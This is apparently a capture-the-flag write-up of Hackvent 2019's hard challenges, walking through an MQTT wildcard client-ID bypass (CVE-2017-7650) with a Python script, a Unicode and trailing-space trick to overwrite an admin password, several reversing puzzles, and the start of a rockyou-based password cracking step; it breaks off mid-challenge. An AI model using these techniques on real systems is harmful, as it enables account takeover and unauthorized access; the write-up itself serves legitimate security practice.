Hackvent 2019 - Hard

The hard levels of Hackvent conitnued with more web hacking, reverse engineering, crypto, and an esoteric programming language. In the reversing challenges, there was not only an iPhone debian package, but also a PS4 update file.
Day 15
![]() |
HV19.15 Santa's Workshop |
Categories: |
![]() |
Level: | hard |
Author: |
inik avarx |
The Elves are working very hard. Look at http://whale.hacking-lab.com:2080/ to see how busy they are.
Page Analysis
The page starts with a counter at 0, but after a second, immediately starts jumping up

To look at the Javascript for the page, I can see a reference in the page source to a config.js
. In that file, there’s an initiation where a MQTT connection is being made to whale.hacking-lab.com:9001
, with username and password:
var mqtt;
var reconnectTimeout = 100;
var host = 'whale.hacking-lab.com';
var port = 9001;
var useTLS = false;
var username = 'workshop';
var password = '2fXc7AWINBXyruvKLiX';
var clientid = localStorage.getItem("clientid");
if (clientid == null) {
clientid = ('' + (Math.round(Math.random() * 1000000000000000))).padStart(16, '0');
localStorage.setItem("clientid", clientid);
var topic = 'HV19/gifts/'+clientid;
// var topic = 'HV19/gifts/'+clientid+'/flag-tbd';
var cleansession = true;
If I look in Burp, I see a bunch of WebSockets traffic:

The first one to the server sends my userid:

There’s a reply of four bytes, and then the next one sends what I guess is the topic, based on the config file:

Also based on the commented out topic, I’m guessing the flag is a topic like that. The rest of the traffic are messages from the server, with only the last few digits increasing (likely related to the increasing count):

MQTT is a machine-to-machine connectivity protocol designed for extremely lightweight publish / subscribe messaging. I’ll use the Python library to create a similar client to what the page is doing, and then look to see what else I can gather.
I have all I need in that config to connect to the MQTT server. I’ll install the Python client (python3 -m pip install paho-mqtt
) and get started.
Read Count Messages
The first thing I wanted to do was to show that I could read the websocket messages that are running the counter. It took a bunch of trial and error, but I got a working script:
#!/usr/bin/env python3
import paho.mqtt.client as mqtt
def on_connect(mqttc, obj, flags, rc):
print(f"Connecting with {clientid}")
print("rc: " + str(rc))
def on_message(mqttc, obj, msg):
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload.decode()))
clientid = "0652706226619681"
client = mqtt.Client(client_id=clientid, transport="websockets")
client.username_pw_set("workshop", password="2fXc7AWINBXyruvKLiX")
client.on_connect = on_connect
client.on_message = on_message
client.connect("whale.hacking-lab.com", 9001, 60, "")
except KeyboardInterrupt:
When I run this, I get a handful of counter messages until I exit with Ctrl-C:
$ ./day15.py
Connecting with 0652706226619681
rc: 0
HV19/gifts/0652706226619681 0 7557707
HV19/gifts/0652706226619681 0 7557708
HV19/gifts/0652706226619681 0 7557715
System Topics
MQTT has wildcards, but they only can be for a full string between /
. So I can do HV19/gifts/1234/#
, but I can’t do HV19/gifts/1234/flag-#
. I tried to subscribe to HV19/gifts/{clientid}/#
, but didn’t get anything beyond the same count messages (I’m not quite sure why?).
I decided to take a look at the SYS Topics. These give status info and other data about the system. I changed my subscribe to $SYS/#
, and I got a big pointer as to where to go next:
$ ./day15.py
Connecting with 0652706226619681
rc: 0
$SYS/broker/version 0 mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)
CVE-2017-7650 involves passing of wildcards into clientids / usernames. The fact that the elves claim to have a genious fix means this is almost certainly the path. I needed to look for a way to get access to this channel with the right username. I went back to subscribing to HV19/gifts/{clientid}
, but this time, I set my clientid to 0652706226619681/+
. When I ran this, I got the flag:
$ ./day15.py
Connecting with 0652706226619681/+
rc: 0
HV19/gifts/0652706226619681/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r} 0 Congrats, you got it. The elves should not overrate their smartness!!!
HV19/gifts/0652706226619681/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r} 0 Congrats, you got it. The elves should not overrate their smartness!!!
Flag: HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}
Day 16
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HV19.16 B0rked Calculator |
Categories: |
![]() ![]() |
Level: | hard |
Author: | hardlock |
Santa has coded a simple project for you, but sadly he removed all the operations. But when you restore them it will print the flag!
I’m given a zip, which contains a Windows exe:
$ unzip HV19.16-b0rked.zip
Archive: HV19.16-b0rked.zip
inflating: b0rked.exe
$ file b0rked.exe
b0rked.exe: PE32 executable (GUI) Intel 80386, for MS Windows
I gave this a run in a Windows VM, and up popped a small calculator:

When I tried to enter an equation, the answer was incorrect, and some text popped up on the screen:

I opened the program in x32dbg. I was looking around a bit, when I found this section:

It caught my eye because of the series of comparisons to the four operators +
, -
, *
, and /
. Just after that call to SendDlgItemMessageA
, on the line I’ve labeled “first input box”, the item I entered into the first input box is pushed onto the stack. The call to 4015F6 returns that value as an int, instead of a string. Then the second input box is done the same way. Then there’s a switch based on the operation selector. And if it matches, it jumped to another function. Those four functions are here:

I’ve got the hint that the operations are removed. Other than a couple move commands, they are all no-operations (or nops
). I need to implement each of the four functions. I can edit the assembly in x32dbg by clicking on the line and hitting space bar. The first function is add. There’s already a move of the first parameter into eax. I’ll just call add, eax, [second parameter]
to add the second one to eax, which is also used as the return value in x86.

When I hit OK, it’s now in place:

I’ll fill in the rest of the operations.

I used sign multiplication (imul
) and things worked fine. I originally used signed division (idiv
), and thing broke. When you do signed division, you do cdq
(where I now have xor edx,edx
to 0 edx) then idiv
. When it broke, I tried unsigned, as above, and things worked.
Now when I do some math, not only is the math right, but the label below gives the flag:

Flag: HV19{B0rked_Flag_Calculat0r}
Day 17
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HV19.17 |
Categories: |
![]() |
Level: | hard |
Author: | scryh |
Buy your special gifts online, but for the ultimative gift you have to become admin.
I’m given a url: http://whale.hacking-lab.com:8881/
The page is for Santa’s Unicode Portal:

If I register an account and log in, I can see a bunch of holiday unicode symbols, but also bits of the source for the page:
if (isset($_GET['show'])) highlight_file(__FILE__);
* Verifies user credentials.
function verifyCreds($conn, $username, $password) {
$usr = $conn->real_escape_string($username);
$res = $conn->query("SELECT password FROM users WHERE username='".$usr."'");
$row = $res->fetch_assoc();
if ($row) {
if (password_verify($password, $row['password'])) return true;
else addFailedLoginAttempt($conn, $_SERVER['REMOTE_ADDR']);
return false;
* Determines if the given user is admin.
function isAdmin($username) {
return ($username === 'santa');
* Determines if the given username is already taken.
function isUsernameAvailable($conn, $username) {
$usr = $conn->real_escape_string($username);
$res = $conn->query("SELECT COUNT(*) AS cnt FROM users WHERE LOWER(username) = BINARY LOWER('".$usr."')");
$row = $res->fetch_assoc();
return (int)$row['cnt'] === 0;
* Registers a new user.
function registerUser($conn, $username, $password) {
$usr = $conn->real_escape_string($username);
$pwd = password_hash($password, PASSWORD_DEFAULT);
$conn->query("INSERT INTO users (username, password) VALUES (UPPER('".$usr."'),'".$pwd."') ON DUPLICATE KEY UPDATE password='".$pwd."'");
* Adds a failed login attempt for the given ip address. An ip address gets blacklisted for 15 minutes if there are more than 3 failed login attempts.
function addFailedLoginAttempt($conn, $ip) {
$ip = $conn->real_escape_string($ip);
$conn->query("INSERT INTO fails (ip) VALUES ('".$ip."')");
The first thing that jumps out is how users are added to the database:
$conn->query("INSERT INTO users (username, password) VALUES (UPPER('".$usr."'),'".$pwd."') ON DUPLICATE KEY UPDATE password='".$pwd."'");
If the username already exists, then just overwrite the password with the new password. That means if I can get the value of UPPER($usr)
to be SANTA
, I can change santa’s password. So what’s stopping that?
The isUsernameAvailable
function makes the check:
function isUsernameAvailable($conn, $username) {
$usr = $conn->real_escape_string($username);
$res = $conn->query("SELECT COUNT(*) AS cnt FROM users WHERE LOWER(username) = BINARY LOWER('".$usr."')");
$row = $res->fetch_assoc();
return (int)$row['cnt'] === 0;
It’s interesting that it is comparing LOWER(username)
(the database info) with BINARY LOWER($usr)
(my input). Why BINARY
? This seems like something I can exploit.
Exploit Unicode
This article explains how. It turns out that there are several unicode characters that evaluate to standard ASCII characters when passed to things like UPPER
. One of those characters is ſ, which bcomes an s
. That means I can register ſanta and that won’t be in the database (the binary compare will return 0), but then it will put SANTA
into the db, changing the password.
I can do this by typing unicode characters into Firefox (Ctrl+Shift+u, then 017f, then space) or by catching the request, and putting in the bytes for this character (0xc5bf
) as follows:
After that registration, I can login as santa with whatever password I registered with.
Exploit Spaces
An alternative (and unintended) method is to do roughly the same thing, but add spaces to the end of the username. It seems they get stripped when saving to the DB, but hang around for the binary compare. So the request looks like:
Login as santa
Either way, I can log in as santa, and access the admin
section, and the flag:

Flag: HV19{h4v1ng_fun_w1th_un1c0d3}
Day 18
![]() |
HV19.18 Dance with me |
Categories: |
![]() ![]() ![]() |
Level: | hard |
Author: | hardlock |
Santa had some fun and created todays present with a special dance. this is what he made up for you:
Dance with him to recover the flag.
I’m given a zip, which contains a Debian binary package:
$ unzip HV19-dance.zip
Archive: HV19-dance.zip
inflating: dance
$ file dance
dance: Debian binary package (format 2.0), with control.tar.gz, data compression lzma
I can extract files from the .deb
package using dpkg-deb
$ dpkg-deb -R dance dance-pkg/
$ find dance-pkg/ -type f -ls
3556 200 -rwxrwx--- 1 root vboxsf 197728 Dec 14 13:52 dance-pkg/usr/bin/dance
3558 8 -rwxrwx--- 1 root vboxsf 221 Dec 14 13:52 dance-pkg/DEBIAN/control
The control files gives information about the package:
Package: com.hacking-lab.dance
Name: dance
Architecture: iphoneos-arm
Description: An awesome tool of some sort!!
Maintainer: hardlock
Author: hardlock
Section: System
Tag: role::hacker
Version: 0.0.1
Installed-Size: 196
It’s an iOS application (you can install deb packages on a jail broken iPhone). Looking at the binary, it’s a Mach-O universal binary.
I’ll load it into Ghidra, and it immediately recognizes the file as three binaries. I’ll let it pull them all in.
After some initial scanning through the main function for each of the three, it seems they are the same (which makes sense given the point of the universal binary). I’ll start with the ARM-32 one. The main function is actually quite simple:
undefined4 _main(void)
int iVar1;
size_t len_flag_in;
uint ctr;
char flag_in [32];
char flag_in_copy [40];
char key_material [40];
iVar1 = *(int *)___stack_chk_guard;
key_material._32_8_ = 0x6b400cecf40f7379;
key_material._0_8_ = 0xaf3cb66146632003;
key_material._8_8_ = 0x9bb500ea7ec276aa;
key_material._16_8_ = 0x4cd04f2197702ffb;
key_material._24_8_ = 0x46eeef0429ac57b2;
flag_in_copy._32_8_ = 0;
flag_in_copy._0_8_ = 0;
flag_in_copy._8_8_ = 0;
flag_in_copy._16_8_ = 0;
flag_in_copy._24_8_ = 0;
_printf("Input your flag: ");
_fgets(flag_in,0x20,*(FILE **)___stdinp);
len_flag_in = _strlen(flag_in);
if (len_flag_in == 0) {
len_flag_in = 0;
else {
_dance((int)flag_in_copy,len_flag_in,0,(undefined4 *)key_material,0xe78f4511,0xb132d0a8);
len_flag_in = _strlen(flag_in);
if (len_flag_in != 0) {
ctr = 0;
do {
ctr = ctr + 1;
len_flag_in = _strlen(flag_in);
} while (ctr < len_flag_in);
if (*(int *)___stack_chk_guard != iVar1) {
/* WARNING: Subroutine does not return */
return 0;
The user is prompted for a flag, which is passed to _dance
along with it’s length, and a few hex words. The result is pulled out, and it loops over each byte, printing it as hex.
Looking into _dance
, I see the following:
void _dance(int flag,uint flag_len,uint null,undefined4 *key1,undefined4 key2,undefined4 key3)
uint ctr;
byte abStack100 [64];
int canary;
canary = *(int *)___stack_chk_guard;
if ((flag_len | null) != 0) {
ctr = 0;
do {
if ((ctr & 0x3f) == 0) {
_dance_block((int)abStack100,key1,key2,key3,ctr >> 6,0);
*(byte *)(flag + ctr) = *(byte *)(flag + ctr) ^ abStack100[ctr & 0x3f];
ctr = ctr + 1;
} while (null + (ctr < flag_len) != 0);
if (*(int *)___stack_chk_guard != canary) {
/* WARNING: Subroutine does not return */
In this code, there’s a loop over all the bytes in the input plaintext. If the byte number is divisible by 64, it calls _dance_block
with a 64 byte buffer, each of the three random values passed in, and the counter divided by 64 (the block count). That resulting 64 bytes are xored against those 64 bytes of plaintext.
Looking at _dance_block
, I noticed some constants:
local_14 = *(int *)___stack_chk_guard;
local_54 = 0x61707865;
local_50 = *param_2;
local_4c = param_2[1];
local_48 = param_2[2];
local_44 = param_2[3];
local_2c = 0x79622d32;
uStack52 = param_5;
uStack48 = param_6;
uStack64 = 0x3320646e;
local_28 = param_2[4];
local_24 = param_2[5];
local_20 = param_2[6];
local_1c = param_2[7];
uStack24 = 0x6b206574;
local_3c = param_3;
uStack56 = param_4;
Googling those led me to this paper from a famous Cryptographer, Daniel Bernstein, on an algorithm called Salsa20. Salsa (a dance) seems like a good lead for this challenge. I’ll also notice that what I labeled as key_material
in the main function is passed into _dance_block
and the first 8 words (32 bytes are used). Rather than try to generate this myself, I looked up the Python implementation of Salsa20. To decrypt, I needed to pass a secret (32 bytes) and a nonce (8 bytes), along with the ciphertext. I went back to the function that called _dance
. I see the pointer to a 32-byte array passed in, which I think is the secret key. I also see two 4-byte words passed in, which could be the 8-byte nonce. The user provides the plaintext. But I’ll assume the hex given to me on the challenge page was the cipher text. If that’s the case, I can just decrypt in python.
My first attempt failed:
>>> from Crypto.Cipher import Salsa20
>>> import binascii
>>> nonce = binascii.unhexlify('e78f4511b132d0a8')
>>> ciphertext = binascii.unhexlify('096CD446EBC8E04D2FDE299BE44F322863F7A37C18763554EEE4C99C3FAD15')
>>> key = binascii.unhexlify('af3cb661466320039bb500ea7ec276aa4cd04f2197702ffb46eeef0429ac57b2')
>>> salsa = Salsa20.new(key=key, nonce=nonce)
>>> salsa.decrypt(ciphertext)
Then I realized I had a byte-ordering issue. I swapped the byte order in the words:
>>> new_key = key[:8][::-1] + key[8:16][::-1] + key[16:24][::-1] + key[24:][::-1]
>>> new_nonce = nonce[:4][::-1] + nonce[4:][::-1]
Now I re-ran Salsa:
>>> salsa = Salsa20.new(key=new_key, nonce=new_nonce)
>>> salsa.decrypt(ciphertext)
Flag: HV19{Danc1ng_Salsa_in_ass3mbly}
Day 19
![]() |
HV19.19 🎅 |
Categories: |
![]() |
Level: | hard |
Author: | M. |
🏁🍇🎶🔤🐇🦁🍟🗞🍰📘🥖🖼🚩🥩😵⛺❗️🥐😀🍉🥞🏁👉️🧀🍎🍪🚀🙋🏔🍊😛🐔🚇🔷🎶📄🍦📩🍋💩⁉️🍄🥜🦖💣🎄🥨📺🥯📽🍖🐠📘👄🍔🍕🐖🌭🍷🦑🍴⛪🤧🌟🔓🔥🎁🧦🤬🚲🔔🕯🥶❤️💎📯🎙🎚🎛📻📱🔋😈🔌💻🐬🖨🖱🖲💾💿🧮🎥🎞🔎💡🔦🏮📔📖🏙😁💤👻🛴📙📚🥓📓🛩📜📰😂🍇🚕🔖🏷💰⛴💴💸🚁🥶💳😎🖍🚎🥳📝📁🗂🥴📅📇📈📉📊🔒⛄🌰🕷⏳📗🔨🛠🧲🐧🚑🧪🐋🧬🔬🔭📡🤪🚒💉💊🛏🛋🚽🚿🧴🧷🍩🧹🧺😺🧻🚚🧯😇🚬🗜👽🔗🧰🎿🛷🥌🎯🎱🎮🎰🎲🏎🥵🧩🎭🎨🧵🧶🎼🎤🥁🎬🏹🎓🍾💐🍞🔪💥🐉🚛🦕🔐🍗🤠🐳🧫🐟🖥🐡🌼🤢🌷🌍🌈✨🎍🌖🤯🐝🦠🦋🤮🌋🏥🏭🗽⛲💯🌁🌃🚌📕🚜🛁🛵🚦🚧⛵🛳💺🚠🛰🎆🤕💀🤓🤡👺🤖👌👎🧠👀😴🖤🔤 ❗️➡️ ㉓ 🆕🍯🐚🔢🍆🐸❗️➡️ 🖍🆕㊷ 🔂 ⌘ 🆕⏩⏩ 🐔🍨🍆❗️ 🐔㉓❗️❗️ 🍇 ⌘ ➡️🐽 ㊷ 🐽 ㉓ ⌘❗️❗️🍉 🎶🔤🍴🎙🦖📺🍉📘🍖📜🔔🌟🦑❤️💩🔋❤️🔔🍉📩🎞🏮🌟💾⛪📺🥯🥳🔤 ❗️➡️ 🅜 🎶🔤💐🐡🧰🎲🤓🚚🧩🤡🔤 ❗️➡️ 🅼 😀 🔤 🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩 🔤❗️📇🔪 🆕 🔡 👂🏼❗️🐔🍨🍆❗️🐔🍨👎🍆❗️❗️❗️ ➡️ 🄼 ↪️🐔🄼❗️🙌 🐔🍨🍆❗️🍇🤯🐇💻🔤👎🔤❗️🍉 ☣️🍇🆕🧠🆕🐔🅜❗️❗️➡️ ✓🔂 ⌘ 🆕⏩⏩🐔🍨🍆❗️🐔🅜❗️❗️🍇🐽 ㊷ 🐽 🅜 ⌘❗️❗️ ➡️ ⌃🐽 🄼 ⌘ 🚮🐔🄼❗️❗️➡️ ^💧🍺⌃➖🐔㉓❗️➗🐔🍨👎👍🍆❗️❗️❌^❌💧⌘❗️➡️ ⎈ ↪️ ⌘ ◀ 🐔🅼❗️🤝❎🍺🐽 ㊷ 🐽 🅼 ⌘❗️❗️➖ 🤜🤜 🐔🅜❗️➕🐔🅜❗️➖🐔🄼❗️➖🐔🅼❗️➕🐔🍨👍🍆❗️🤛✖🐔🍨👎👎👎🍆❗️🤛 🙌 🔢⎈❗️❗️🍇 🤯🐇💻🔤👎🔤❗️🍉✍✓ ⎈ ⌘ 🐔🍨👎🍆❗️❗️🍉🔡🆕📇🧠✓ 🐔🅜❗️❗️❗️➡️ ⌘↪️⌘ 🙌 🤷♀️🍇🤯🐇💻🔤👎🔤❗️🍉😀🍺⌘❗️🍉 🍉
This challenge beat me. And it almost cost me my perfect score in day 19. I recognized the string of emojis as EmojiCode. EmojiCode starts with a 🏁, and then uses blocks of code between 🍇 and 🍉.
I took three approaches to the challenge, and the first two came up short.
Compile It
I installed the EmojiCode compiler using their install instructions compiler. Then, after dropping the emoji into a file ending in .emojic
, I ran the compiler to get an executable:
$ emojicodec day19.emojic
day19.emojic:1:297: ⚠️ warning: Type is ambiguous without more context.
day19.emojic:1:423: ⚠️ warning: Type is ambiguous without more context.
day19.emojic:1:452: ⚠️ warning: Type is ambiguous without more context.
day19.emojic:1:491: ⚠️ warning: Type is ambiguous without more context.
$ ls
day19 day19.emojic day19.o
$ file day19
day19: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e8e8f6e4da2354d354d6097c839a5528c89c1a42, not stripped
I could run it, and I’m given a prompt:
# ./day19
🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩
Any guesses I entered resulted in:
🤯 Program panicked: 👎
I thought for sure I could just open it in Ghidra or Ida and see where the flag was, but the code it created was a giant mess. I did a good bit of trying to orient myself, but eventually moved on.
Source Analysis
I spent some time going through the source trying to understand it. The EmojiCode docs are kind of frustrating, as while here is a lot of prose, there isn’t a single page cheat sheet for what each emoji means.
I added some whitespace:
1 🏁🍇
2 🎶🔤🐇🦁🍟🗞🍰📘🥖🖼🚩🥩😵⛺❗️🥐😀🍉🥞🏁👉️🧀🍎🍪🚀🙋🏔🍊😛🐔🚇🔷🎶📄🍦📩🍋💩⁉️🍄🥜🦖💣🎄🥨📺🥯📽🍖🐠📘👄🍔🍕🐖🌭🍷🦑🍴⛪🤧🌟🔓🔥🎁🧦🤬🚲🔔🕯🥶❤️💎📯🎙🎚🎛📻📱🔋😈🔌💻🐬🖨🖱🖲💾💿🧮🎥🎞🔎💡🔦🏮📔📖🏙😁💤👻🛴📙📚🥓📓🛩📜📰😂🍇🚕🔖🏷💰⛴💴💸🚁🥶💳😎🖍🚎🥳📝📁🗂🥴📅📇📈📉📊🔒⛄🌰🕷⏳📗🔨🛠🧲🐧🚑🧪🐋🧬🔬🔭📡🤪🚒💉💊🛏🛋🚽🚿🧴🧷🍩🧹🧺😺🧻🚚🧯😇🚬🗜👽🔗🧰🎿🛷🥌🎯🎱🎮🎰🎲🏎🥵🧩🎭🎨🧵🧶🎼🎤🥁🎬🏹🎓🍾💐🍞🔪💥🐉🚛🦕🔐🍗🤠🐳🧫🐟🖥🐡🌼🤢🌷🌍🌈✨🎍🌖🤯🐝🦠🦋🤮🌋🏥🏭🗽⛲💯🌁🌃🚌📕🚜🛁🛵🚦🚧⛵🛳💺🚠🛰🎆🤕💀🤓🤡👺🤖👌👎🧠👀😴🖤🔤 ❗️➡️ ㉓
3 🆕🍯🐚🔢🍆🐸❗️➡️ 🖍
4 🆕㊷ 🔂 ⌘ 🆕⏩⏩ 🐔🍨🍆❗️ 🐔㉓❗️❗️
5 🍇
6 ⌘ ➡️🐽 ㊷ 🐽 ㉓ ⌘❗️❗️
7 🍉
8 🎶🔤🍴🎙🦖📺🍉📘🍖📜🔔🌟🦑❤️💩🔋❤️🔔🍉📩🎞🏮🌟💾⛪📺🥯🥳🔤 ❗️➡️ 🅜
9 🎶🔤💐🐡🧰🎲🤓🚚🧩🤡🔤 ❗️➡️ 🅼
10 😀 🔤 🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩 🔤❗️📇
11 🔪 🆕 🔡 👂🏼❗️🐔🍨🍆❗️🐔🍨👎🍆❗️❗️❗️ ➡️ 🄼 ↪️🐔🄼❗️🙌 🐔🍨🍆❗️
12 🍇
13 🤯🐇💻🔤👎🔤❗️
14 🍉
15 ☣️🍇
16 🆕🧠🆕🐔🅜❗️❗️➡️ ✓🔂 ⌘ 🆕⏩⏩🐔🍨🍆❗️🐔🅜❗️❗️
17 🍇
18 🐽 ㊷ 🐽 🅜 ⌘❗️❗️ ➡️ ⌃🐽 🄼 ⌘ 🚮🐔🄼❗️❗️➡️ ^💧🍺⌃➖🐔㉓❗️➗🐔🍨👎👍🍆❗️❗️❌^❌💧⌘❗️➡️ ⎈ ↪️ ⌘ ◀ 🐔🅼❗️🤝❎🍺🐽 ㊷ 🐽 🅼 ⌘❗️❗️➖ 🤜🤜 🐔🅜❗️➕🐔🅜❗️➖🐔🄼❗️➖🐔🅼❗️➕🐔🍨👍🍆❗️🤛✖🐔🍨👎👎👎🍆❗️🤛 🙌 🔢⎈❗️❗
19 🍇
20 🤯🐇💻🔤👎🔤❗️
21 🍉
22 ✍✓ ⎈ ⌘ 🐔🍨👎🍆❗️❗️
23 🍉
24 🔡🆕📇🧠✓ 🐔🅜❗️❗️❗️➡️ ⌘↪️⌘ 🙌 🤷♀️
25 🍇
26 🤯🐇💻🔤👎🔤❗️
27 🍉
28 😀🍺⌘❗️
29 🍉
30 🍉
Here’s some basic analysis of the program:
- Lines 1 and 30 are the blocks around the program.
- Lines 2, 8, and 9 are strings being saved to variables.
- The prompt is printed on line 10.
- Line 11 reads from stdin (👂🏼).
- Lines 12-14, 19-21, and 25-27 are printing the fail message. I can change the output string (🔤👎🔤) so that they are different for each one to see which is printing. For example, when I enter
, it dies at lines 19-21. - Line 16 creates a memory region (🆕🧠🆕).
- Line 28 prints the flag.
I played with removing the panic. For example, If I replace line 20 with 😀🔤👎2🔤❗️
so that it prints and doesn’t panic, I can get output like this:
$ ./day19-mod
🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩
I thought maybe the flag format would help, but it didn’t:
$ ./day19-mod
🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩
I do notice that if I enter an emoji, I get something closer:
$ ./day19-mod
🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩
Looking more closely at the line that is read from stdin:
🔪 🆕 🔡 👂🏼❗️🐔🍨🍆❗️🐔🍨👎🍆❗️❗️❗️ ➡️ 🄼 ↪️🐔🄼❗️🙌 🐔🍨🍆❗️
Right after the input()
comes ❗️🐔🍨🍆❗️🐔🍨👎🍆❗️
. Knowing that 🐔 = strlen()
and 🍨🍆 = []
, that roughly becomes:
So it’s only looking at the first character input.
Guess Based on Prompt
Thinking that the input is likely a single emoji, I took another look at the prompt:
🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩
There’s a lock, and Santa’s stuck, what to do, Christmas tree and flag. My first thought was a chimney, but didn’t find any emoji that worked. I tried windows, everything from the unicode portal on day 17. Eventually I entered a key:
🔒 ➡️ 🎅🏻⁉️ ➡️ 🎄🚩
Flag: HV19{*<|:-)____\o/____;-D}
Day 20
![]() |
HV19.20 i want to play a game |
Categories: |
![]() ![]() |
Level: | hard |
Author: | hardlock |
Santa was spying you on Discord and saw that you want something weird and obscure to reverse?
your wish is my command.
I’m given a zip, which contains a strange file:
$ unzip HV19-game.zip
Archive: HV19-game.zip
inflating: game
$ file game
game: Intel amd64 COFF object file, no line number info, not stripped, 26 sections, symbol offset=0xb50, 99 symbols
Looking at the strings in the binary, I see this:
Immediately I start to think about PS4 updates.
The file opens in Ghidra, but I’ll eventually figure out that the offsets are wrong, and there’s a few other things not quite right. After spending some time looking at the code and getting caught up, I took a step back and surveyed what I had. First, in the .data
section, there was a buffer of bytes:

Just after that, came several strings:

Next I started looking through the code. While I was doing so, I had up various examples from the PS4-SDK GitHub, like this and this.
First there was some initialization stuff, and malloc
some buffers:
(*(code *)refptr.initKernel)();
(*(code *)refptr.initLibc)();
(*(code *)refptr.initNetwork)();
sock = (**(code **)refptr.sceKernelLoadStartModule)(0x2174,0,0,0,0,0);
fread = refptr.sceKernelDlsym;
(*(code *)refptr.sceKernelDlsym)((ulong)sock,0x219d,&local_520);
(*(code *)fread)((ulong)sock,0x21c6,&local_518);
fread = refptr.malloc;
file = (**(code **)refptr.malloc)(0x40);
uVar3 = (**(code **)fread)(0x10);
Next comes an interesting block:
file = (**(code **)refptr.fopen)(0x2234,0x222a);
j = (**(code **)fread)(0x21);
(*(code *)refptr.MD5Init)(local_4a0);
md5update = refptr.MD5Update;
fread = refptr.fread;
while( true ) {
sock = (**(code **)fread)(auStack1072,1,0x400,file);
if (sock == 0) break;
(*(code *)md5update)(local_4a0,auStack1072,(ulong)sock);
md5_out = local_500;
(*(code *)refptr.MD5Final)(md5_out,local_4a0);
(**(code **)refptr.fclose)(file);
md5update = refptr.sprintf;
i = j;
do {
bVar1 = *(byte *)md5_out;
md5_out = (undefined2 *)((long)md5_out + 1);
(**(code **)md5update)(i,0x22d7,(ulong)bVar1);
i = i + 2;
} while (&socket.len != md5_out);
The file opened can’t be what’s actually at 0x2234 or 0x222a, as neither of those are strings:

But, based on what I know about fread
and the strings available to me, I can guess it’s:
fopen('/mnt/usb0/PS4UPDATE.PUP', 'rb')
Now it initializes an MD5sum, and reads in 0x400 bytes at a time, passing the results reach time to MD5Update
. Once it’s read the entire file, it calls MD5Final
The result is then looped over, for each byte, passing it to sprintf
. While I can’t be sure of the offsets, it would make perfect sense that it’s calling it with %02x
, as that would convert each byte from the md5sum into a hex string.
Next, there’s a strcmp
iVar2 = (**(code **)refptr.strcmp)(0x22fe,j);
if (iVar2 == 0) {
The rest of the code doesn’t run unless the new md5 string matches some other string. That string has to be “f86d4f9d2c049547bd61f942151ffb55” from the data section. Googling for it also reveals it’s the md5 for a PS4 Jailbreak exploit.
Assuming they match, it then starts a loop:
j = 0;
do {
abStack1248[j] = *(byte *)(j + 0x229b);
j = j + 1;
} while (j != 0x1a);
j = 0x1337;
file = (**(code **)refptr.fopen)(0x2322,0x2318);
do {
(**(code **)refptr.fseek)(file,j,0);
(**(code **)fread)(local_4c0,0x1a,1,file);
i = 0;
do {
abStack1248[i] = abStack1248[i] ^ local_4c0[i];
i = i + 1;
} while (i != 0x1a);
j = j + 0x1337;
} while (j != 0x1714908);
(**(code **)refptr.fclose)(file);
It first reads 0x1a (27) bytes from memory. This seems like the 27 byte buffer at the start of .data
. Then it sets a counter to 0x1337, and re-opens a file. I’m going to guess that’s still the exploit file. It seeks counter bytes into the file, reads 27 bytes, and xors them against the 27 byte array. Then it increments the counter by 0x1337, and does it again, until the counter is 0x1714908. Then it closes the file.
Finally, there’s a list block:
local_501 = 0;
socket_name = 0x67616c66646e6573;
socket.len = 0x210;
server.ip = 0x100007f;
server.port = (**(code **)refptr.sceNetHtons)(0x539);
(**(code **)refptr.memset)(local_4e6,0,6);
sock = (**(code **)refptr.sceNetSocket)(&socket_name,2,1,0);
(**(code **)refptr.sceNetConnect)((ulong)sock,&socket.len,0x10);
(**(code **)refptr.sceNetSend)((ulong)sock,abStack1248,0x1a,0);
(**(code **)refptr.sceNetSocketClose)((ulong)sock);
This code opens a connection to localhost:1337 and sends the 27 byte buffer.
I want to see what’s in that buffer. So I download the exploit file, and I created a file called key
with the original 27 bytes in it. Then I wrote some python that would simulate what I saw in the Ghidra decompiled C:
#!/usr/bin/env python3
import binascii
with open("key", "r") as f:
key = binascii.unhexlify(f.read().strip())
with open("505Retail.PUP", "rb") as f:
pup = f.read()
ctr = 0x1337
while ctr != 0x1714908:
key = [x ^ y for x, y in zip(key, pup[ctr : ctr + 0x1A])]
ctr += 0x1337
print("".join([chr(c) for c in key]))
When I run this, it prints the flag:
$ python3 solve.py
Flag: HV19{C0nsole_H0mebr3w_FTW}
Day 21
![]() |
HV19.21 |
Categories: |
![]() ![]() |
Level: | hard |
Author: | hardlock |
Santa has improved since the last Cryptmas and now he uses harder algorithms to secure the flag.
This is his public key:
X: 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f Y: 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943cX
To make sure this is safe, he used the NIST P-256 standard.
But we are lucky and an Elve is our friend. We were able to gather some details from our whistleblower:
- Santa used a password and SHA256 for the private key (d)
- His password was leaked 10 years ago
- The password is length is the square root of 256
- The flag is encrypted with AES256
- The key for AES is derived with
, salt: “TwoHundredFiftySix”, iterations:256 * 256 * 256
Phew - Santa seems to know his business - or can you still recover this flag?
This challenge is a very straight forward once I understand the elements given to me. Santa has a password, that was in a breach from 10 years ago. Googling “2009 password breach” shows me that is the famous rockyou list:

I also know it’s 16 characters long (“The password is length is the square root of 256”). rockyou.txt
comes on Kali, or I could download it from the internet. I’ll make a custom list using grep to get just the passwords with 16 characters:
$ grep -E '^.{16}$' /usr/share/wordlists/rockyou.txt > rockyou16.txt
This reduces the number of possible passwords from over 14 million to less than 120 thousand:
$ wc -l rockyou16.txt
118092 rockyou16.txt
